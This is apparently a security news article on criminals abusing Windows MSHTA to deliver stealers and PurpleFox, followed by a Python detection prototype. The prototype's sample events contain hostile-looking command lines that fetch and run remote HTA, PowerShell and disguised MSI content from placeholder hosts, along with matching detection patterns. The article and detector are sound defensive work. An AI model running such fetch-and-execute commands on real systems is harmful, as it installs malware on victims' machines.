Well-meaning designs can sometimes backfire. MSHTA is a prime example of this.
MSHTA (Microsoft HTML Application) has been included in Windows since 1999, debuting with Windows 98 SE and Internet Explorer 5.0. It remains a component of Windows today, even in the most recent versions. It also continues to function within Microsoft Edge via IE mode. Its persistence aligns with Microsoft’s longstanding commitment to maintaining backward compatibility.
Over time, legitimate applications for MSHTA have dwindled. Conversely, its exploitation has surged. Cybercriminals increasingly leverage MSHTA as a Living-off-the-Land binary (LOLBIN) to stealthily deploy a wide array of malware – from common data stealers and loaders to sophisticated, persistent threats like PurpleFox.
Since the beginning of this year, Bitdefender has observed a sharp increase in MSHTA-related malicious activity. The company attributes this spike to heightened exploitation by threat actors rather than a resurgence in legitimate administrative use.
MSHTA
MSHTA is engineered to run HTML application (HTA) files, which are scripts composed of HTML together with VBScript or JavaScript. An HTA file fetched from an external server can be crafted to execute VBScript directly in memory, so the local system only sees the activity of a trusted, Microsoft-signed binary, not the hidden in-memory operations. Because of this inherent trust and its continued legitimate use, blocking it automatically is challenging. The consequence is that covert malicious code can be executed, which can then retrieve additional LOLBIN components, ultimately resulting in the deployment of harmful malware.
“MSHTA offers attackers a pre-installed, Microsoft-signed tool that can fetch and run remote script content during the initial or middle phases of an infection sequence,” Bitdefender reports.
Attackers initiate the process using straightforward social engineering tactics.
Delivering malware
One frequent misuse of MSHTA identified by Bitdefender involved the HTA CountLoader being used to deliver the Lumma and Amatera stealers. In one Lumma campaign, potential victims were lured via messages, social media posts, or SEO-poisoned websites advertising free or pirated software.
If the victim falls for the trick, they execute a setup file that is actually a Python interpreter, which then loads the Python runtime. The downloaded ‘free software’ package contains all the required scripts along with an MSHTA executable that connects to the attacker’s command-and-control server to fetch the HTA loader.
The HTA then decodes the subsequent payload and runs it. This action downloads and activates the stealer.
The Emmenhtal loader was also seen delivering Lumma and other stealers. This campaign began with phishing messages sent through Discord. The victim is deceived into visiting a webpage crafted to hijack the clipboard and trick the user into running a malicious command line as part of a fake human verification step. If the user is then further manipulated into pressing Win + R to open the Run dialog, followed by Ctrl + V and Enter to paste and execute the command, explorer.exe appears to legitimately launch MSHTA.
Ultimately, a PowerShell script is retrieved from a remote server and executed in memory without being saved to the hard drive.
Other MSHTA-driven campaigns have included the delivery of ClipBanker and PurpleFox. ClipBanker is a type of malware created mainly to swap cryptocurrency wallet addresses in the clipboard to steal funds. “In this infection sequence, MSHTA serves as an initial execution mechanism that starts a remote HTA and swiftly moves to PowerShell-based persistence and payload delivery,” Bitdefender explains.
PurpleFox is a more complex and persistent malware family that has been operational since 2018. “One of its consistent delivery techniques, however, has remained unchanged: launching msiexec from an MSHTA command line to download and run an MSI package disguised as a .png file,” Bitdefender states.
While the report details indicators of compromise (IOCs), it is evident that social engineering plays a crucial role in MSHTA abuse; the rise in such abuse also shows that social engineering tactics remain highly effective.
“The primary defense against this kind of attack is user awareness,” said Silviu Stahie, Security Analyst at Bitdefender. “If we can persuade people to stop executing commands in their terminals, in PowerShell, and similar tools, we could prevent most of these issues. The same applies to downloading cracked software or pirated games. There is a high probability of getting infected this way. I would estimate that over 90% of attacks would cease immediately if we simply stopped falling for these tricks.”
Defending against MSHTA abuse should naturally include user awareness training, but technical countermeasures are equally vital. “Protection must address multiple stages of the attack chain, from reducing the attack surface to pre-execution detection and runtime behavioral blocking,” the researchers caution.
“As for organizations,” Stahie continued, “blocking all these legacy binaries should be the standard approach. Unless you have a critical application that still requires MSHTA, users should not have access to it. It should be blocked at the firewall level.”
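The process-creation patterns the article describes (explorer.exe launching mshta.exe with a remote URL after a Run-dialog paste, mshta.exe spawning PowerShell or msiexec, and an MSI fetched under a .png name) can be turned into simple detection logic. This is an added example, not Bitdefender's code; the events below are constructed in Sysmon Event ID 1 style and the hostnames are placeholders.

```python
"""Prototype detections for the MSHTA abuse chains discussed above (constructed sample data)."""
import re

# Constructed process-creation events; hostnames and arguments are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://cdn.example.invalid/verify.hta"},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc <base64-placeholder>"},
    {"parent": "mshta.exe", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i http://files.example.invalid/update.png /q"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe report.txt"},
    # A local legacy HTA started by a service: no remote URL, so it should not alert.
    {"parent": "services.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe C:\\Program Files\\LegacyApp\\console.hta"},
]

URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
IMAGE_EXT_RE = re.compile(r"\.(?:png|jpg|gif)(?:\?|$)", re.IGNORECASE)
CHILDREN_OF_INTEREST = {"powershell.exe", "pwsh.exe", "cmd.exe", "msiexec.exe", "wscript.exe"}

def classify(event):
    """Return the detection labels that apply to one process-creation event."""
    parent, image = event["parent"].lower(), event["image"].lower()
    cmdline = event["cmdline"]
    hits = []
    if image == "mshta.exe" and URL_RE.search(cmdline):
        hits.append("mshta_remote_hta")          # HTA content fetched from a remote server
        if parent == "explorer.exe":
            hits.append("mshta_from_run_dialog")  # ClickFix-style: Win+R paste launches it via explorer.exe
    if parent == "mshta.exe" and image in CHILDREN_OF_INTEREST:
        hits.append("mshta_spawns_" + image.split(".")[0])
        url = URL_RE.search(cmdline)
        if image == "msiexec.exe" and url and IMAGE_EXT_RE.search(url.group(0)):
            hits.append("msiexec_remote_msi_disguised_as_image")  # PurpleFox-style delivery
    return hits

def triage(events):
    """Keep only events that triggered at least one label, paired with their command line."""
    return [(e["cmdline"], classify(e)) for e in events if classify(e)]

if __name__ == "__main__":
    for cmd, labels in triage(SAMPLE_EVENTS):
        print(labels, "<-", cmd)
```

The local-HTA event shows the trade-off Stahie describes: a blanket block on mshta.exe is simplest, but where a legacy application still needs it, the remote-URL and child-process conditions keep alerts focused on the abuse patterns.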